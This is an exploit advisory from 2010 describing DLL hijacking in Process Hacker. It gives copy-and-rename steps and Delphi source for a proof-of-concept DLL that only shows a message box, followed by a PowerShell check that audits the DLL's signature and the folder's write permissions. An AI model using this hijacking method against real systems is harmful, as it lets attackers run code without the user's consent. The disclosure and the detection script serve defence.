
[local exploits] - Process Hacker Dll Hijacking Exploit

Posted on 08 September 2010

====================================
Process Hacker Dll Hijacking Exploit
====================================

Exploit Title : [Process Hacker Dll Hijacking Exploit]
Date          : [09 Sept 2010]
Author        : [STRELiTZIA]
Software      : [Process Hacker]
Tested on     : [Windows Xp SP3]

============================
=       Description        =
============================
Process Hacker searches for and loads the %Process Hacker%dbghelp.dll library without checks and without any visible warning when the library has been modified.
This vulnerability can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application.

============================
=       Instructions       =
============================
1- Copy "Test.dll" into "%Process Hacker% folder"
2- Rename "Test.dll" to "dbghelp.dll"

============================
=          Tests           =
============================
- Launch Process Hacker.

============================
= Test Dll Source "Delphi" =
============================
Library Test;

uses
  Windows;

// The main block of a Delphi library runs when the DLL is loaded into a process.
begin
  MessageBoxA
  (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
    PChar('Sample'),
    MB_ICONSTOP
  );
end.

# Inj3ct0r.com [2010-09-08]
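
A defender-side check for the condition this advisory describes, as an added example that is not part of the original advisory: it reports whether the DLL in the application folder carries a valid Authenticode signature, records its SHA-256, and lists the principals other than SYSTEM, Administrators and TrustedInstaller that can create files in that folder. The function name `Test-AppDirDll` and the `-AppDir` value are assumptions; supply the real install folder.

```powershell
# Added example, not from the original advisory. Test-AppDirDll is a hypothetical name.
function Test-AppDirDll {
    param(
        [Parameter(Mandatory)] [string] $AppDir,   # assumed: the application's install folder
        [string] $DllName = 'dbghelp.dll'          # DLL named in the advisory
    )
    $dll = Join-Path $AppDir $DllName
    $report = [ordered]@{
        Path = $dll; Present = (Test-Path -LiteralPath $dll -PathType Leaf)
        SignatureStatus = $null; Signer = $null; Sha256 = $null; NonAdminWriters = @()
    }
    if ($report.Present) {
        # NotSigned or HashMismatch means the file is unsigned or was altered after signing.
        $sig = Get-AuthenticodeSignature -LiteralPath $dll
        $report.SignatureStatus = $sig.Status
        if ($sig.SignerCertificate) { $report.Signer = $sig.SignerCertificate.Subject }
        # Record the hash so it can be compared with the vendor's copy or an earlier baseline.
        $report.Sha256 = (Get-FileHash -LiteralPath $dll -Algorithm SHA256).Hash
    }
    # Principals expected to hold write access to an install folder, by well-known SID:
    # SYSTEM, BUILTIN\Administrators, TrustedInstaller.
    $trusted = @(
        'S-1-5-18',
        'S-1-5-32-544',
        'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
    )
    # Rights that allow creating a file in the folder.
    $writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'
    $sidType   = [System.Security.Principal.SecurityIdentifier]
    $rules     = (Get-Acl -LiteralPath $AppDir).GetAccessRules($true, $true, $sidType)
    $report.NonAdminWriters = @(
        $rules | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.FileSystemRights -band $writeBits) -ne 0 -and
            $trusted -notcontains $_.IdentityReference.Value
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique
    )
    [pscustomobject]$report
}

# Usage (the path is a placeholder, not taken from the advisory):
# Test-AppDirDll -AppDir 'C:\Path\To\Process Hacker'
```

A non-empty `NonAdminWriters` list, or a `SignatureStatus` other than `Valid` on a DLL the vendor ships signed, is the state to investigate.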

 
